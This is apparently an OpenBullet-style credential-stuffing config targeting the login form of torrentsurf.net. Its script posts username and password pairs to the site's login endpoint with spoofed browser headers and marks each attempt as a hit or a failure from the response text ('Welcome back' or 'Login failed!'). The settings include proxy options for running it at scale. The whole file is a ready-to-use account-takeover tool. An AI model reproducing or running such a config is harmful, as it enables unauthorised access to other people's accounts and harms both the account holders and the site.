[SETTINGS]
{
  "Name": "Torrentsurf",
  "SuggestedBots": 1,
  "LastModified": "2018-11-03T09:55:21.9389966+00:00",
  "AdditionalInfo": "proxies user:pass",
  "Author": "KREAMKLICC",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "http://torrentsurf.net/tlogin.php" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: torrentsurf.net" 
  HEADER "Origin: http://torrentsurf.net" 
  HEADER "Referer: http://torrentsurf.net/login.php?" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Login failed!" 
  KEYCHAIN Success OR 
    KEY "Welcome back" 
